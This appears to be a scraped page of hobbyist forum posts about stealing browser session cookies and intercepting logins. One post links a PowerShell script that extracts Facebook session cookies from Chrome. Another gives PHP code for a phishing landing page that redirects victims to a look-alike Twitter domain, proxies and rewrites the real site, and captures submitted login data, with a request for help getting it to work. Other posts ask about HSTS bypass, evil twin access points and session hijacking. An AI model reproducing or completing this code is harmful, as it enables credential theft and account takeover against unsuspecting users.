Search the Community

Hi, Based on the powershell script written to extract creds from Google Chrome, I made a script to read the SQLite database where the cookies are stored and extract Facebook session cookies. It uses no library, like in the ChromeCreds payload, I use regex to search for the cookies. I haven't written any payload, and I also want to do the same with Firefox. http://pastebin.com/25Z8peMb Enjoy

Hey guys, I've ran into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php" Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data: <?php if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) { /* If not visiting twitter, redirect to non-HSTS twitter domain */ die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); } else { /* form posts to http://twitter.co.uk/sessions */ if(strstr($_SERVER['REQUEST_URI'], "/sessions")) { /* var_dump($_POST) returns an empty array, should print login data */ var_dump($_POST); die(); } /* Curl the site */ $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */ $result = str_replace('<script', "<div style='display:none'><!--", $result); $result = str_replace('</script', "--></div", $result); echo $result; } ?> if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.

Is it possible to use one-click-buttons... like login with facebook or pay with paypal... on a landing Page? What methods these buttons use... are them based on simple text cookies? Is it possible to get useful data with that method? im thankfull for any hints and advises.

I've been working on this program I call Mmrgh for about 5 months now and after this weeks episode of Hak.5 when they were talking about stealing cookies I decided to automate the process in my program. I was really surprised how easy it was to do! Chrome hasn't even attempted to put security on theirs and it looks like Firefox tried to but it was really easy to get around. Anyways here's a video of my work if you want to see it. https://www.youtube....eature=youtu.be And you guys can go ahead and add me on Facebook if you saw my name :P

I am asking is this because security is changing rapidly. You can no longer use ssltrip on the sites that contain juicy info because of hsts and I heard Karma will no longer be effective for newer devices do to driver patches. That being said can it do: Ssl split to get around the hsts Create evil twin? Cookie collect/session hijack? Run airmon-ng or the aircrack suite? Apr spoof a connect Ap?